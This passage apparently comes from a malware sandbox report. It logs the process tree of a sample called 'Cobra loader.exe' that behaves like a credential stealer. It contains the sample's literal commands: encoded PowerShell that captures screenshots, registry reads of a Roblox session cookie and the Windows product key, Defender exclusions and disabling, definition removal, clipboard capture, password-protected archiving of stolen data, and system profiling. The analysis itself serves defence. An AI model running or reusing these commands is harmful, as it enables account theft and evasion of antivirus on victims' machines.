IAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
3⤵
PID:4012

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
4⤵
- Command and Scripting Interpreter: PowerShell
PID:1068

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\bildy3ko\bildy3ko.cmdline"
5⤵
PID:3492

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE0FC.tmp" "c:\Users\Admin\AppData\Local\Temp\bildy3ko\CSC6C069E418E494FAEB8FF87F740FCCFC6.TMP"
6⤵
PID:1080

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
3⤵
PID:4804

C:\Windows\system32\tree.com
tree /A /F
4⤵
PID:5712

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
3⤵
PID:1596

C:\Windows\system32\tree.com
tree /A /F
4⤵
PID:716

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
3⤵
PID:4032

C:\Windows\system32\tree.com
tree /A /F
4⤵
PID:1844

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
3⤵
PID:2784

C:\Windows\system32\tree.com
tree /A /F
4⤵
PID:5500

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
3⤵
PID:3636

C:\Windows\system32\tree.com
tree /A /F
4⤵
PID:2488

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4052"
3⤵
PID:5692

C:\Windows\system32\taskkill.exe
taskkill /F /PID 4052
4⤵
- Kills process with taskkill
PID:6076

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5636"
3⤵
PID:6096

C:\Windows\system32\taskkill.exe
taskkill /F /PID 5636
4⤵
- Kills process with taskkill
PID:3276

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1428"
3⤵
PID:3840

C:\Windows\system32\taskkill.exe
taskkill /F /PID 1428
4⤵
- Kills process with taskkill
PID:5128

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1064"
3⤵
PID:404

C:\Windows\system32\taskkill.exe
taskkill /F /PID 1064
4⤵
- Kills process with taskkill
PID:4668

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4424"
3⤵
PID:5092

C:\Windows\system32\taskkill.exe
taskkill /F /PID 4424
4⤵
- Kills process with taskkill
PID:5416

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3812"
3⤵
PID:5696

C:\Windows\system32\taskkill.exe
taskkill /F /PID 3812
4⤵
- Kills process with taskkill
PID:3240

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2616"
3⤵
PID:1076

C:\Windows\system32\taskkill.exe
taskkill /F /PID 2616
4⤵
- Kills process with taskkill
PID:4148

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2952"
3⤵
PID:1840

C:\Windows\system32\taskkill.exe
taskkill /F /PID 2952
4⤵
- Kills process with taskkill
PID:4520

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4088"
3⤵
PID:4292

C:\Windows\system32\taskkill.exe
taskkill /F /PID 4088
4⤵
- Kills process with taskkill
PID:4636

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "getmac"
3⤵
PID:4908

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
PID:1068

C:\Windows\system32\getmac.exe
getmac
4⤵
PID:4084

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5432"
3⤵
PID:5876

C:\Windows\system32\taskkill.exe
taskkill /F /PID 5432
4⤵
- Kills process with taskkill
PID:5652

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1248"
3⤵
PID:5768

C:\Windows\system32\taskkill.exe
taskkill /F /PID 1248
4⤵
- Kills process with taskkill
PID:3536

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 400"
3⤵
PID:5632

C:\Windows\system32\taskkill.exe
taskkill /F /PID 400
4⤵
- Kills process with taskkill
PID:1172

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
3⤵
PID:2732

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
4⤵
PID:5224

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
3⤵
PID:5916

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
4⤵
PID:2056

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI24962\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\bijZ1.zip" *"
3⤵
PID:3956

C:\Users\Admin\AppData\Local\Temp\_MEI24962\rar.exe
C:\Users\Admin\AppData\Local\Temp\_MEI24962\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\bijZ1.zip" *
4⤵
- Executes dropped EXE
PID:5520

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
3⤵
PID:5484

C:\Windows\System32\Wbem\WMIC.exe
wmic os get Caption
4⤵
PID:5988

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
3⤵
PID:4660

C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
4⤵
PID:3288

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
3⤵
PID:3108

C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
4⤵
PID:3440

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
3⤵
PID:5412

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
4⤵
PID:3916

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
3⤵
PID:5496

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
4⤵
- Detects videocard installed
PID:3924

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
3⤵
PID:5560

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
4⤵
PID:3796

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
1⤵
PID:4804

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\ \Credentials\Edge\Edge Cookies.txt
1⤵
PID:4640

C:\Users\Admin\Desktop\Cobra loader.exe
"C:\Users\Admin\Desktop\Cobra loader.exe"
1⤵
- Executes dropped EXE
PID:4312

C:\Users\Admin\Desktop\Cobra loader.exe
"C:\Users\Admin\Desktop\Cobra loader.exe"
2⤵
- Executes dropped EXE
PID:3992

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Cobra loader.exe'"
3⤵
PID:4496

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Cobra loader.exe'
4⤵
- Command and Scripting Interpreter: PowerShell
PID:4292

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
3⤵
PID:1280

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
4⤵
PID:2044

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‏ .scr'"
3⤵
PID:1376

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‏ .scr'
4⤵
- Command and Scripting Interpreter: PowerShell
PID:3600

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
3⤵
PID:732

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
4⤵
- Enumerates processes with tasklist
PID:4888

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
3⤵
PID:4840

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
4⤵
- Enumerates processes with tasklist
PID:540

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
3⤵
PID:4188

C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
4⤵
PID:4944

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
3⤵
PID:1400

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
4⤵
PID:2056

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
3⤵
PID:244

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
4⤵
- Enumerates processes with tasklist
PID:2700

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
3⤵
PID:6076

C:\Windows\system32\tree.com
tree /A /F
4⤵
PID:3704

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
3⤵
PID:1596

C:\Windows\system32\tree.com
tree /A /F
4⤵
PID:3904

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
3⤵
PID:5520

C:\Windows\system32\netsh.exe
netsh wlan show profile
4⤵
PID:3616

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
3⤵
PID:5112

C:\Windows\system32\systeminfo.exe
systeminfo
4⤵
- Gathers system information
PID:2660

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUA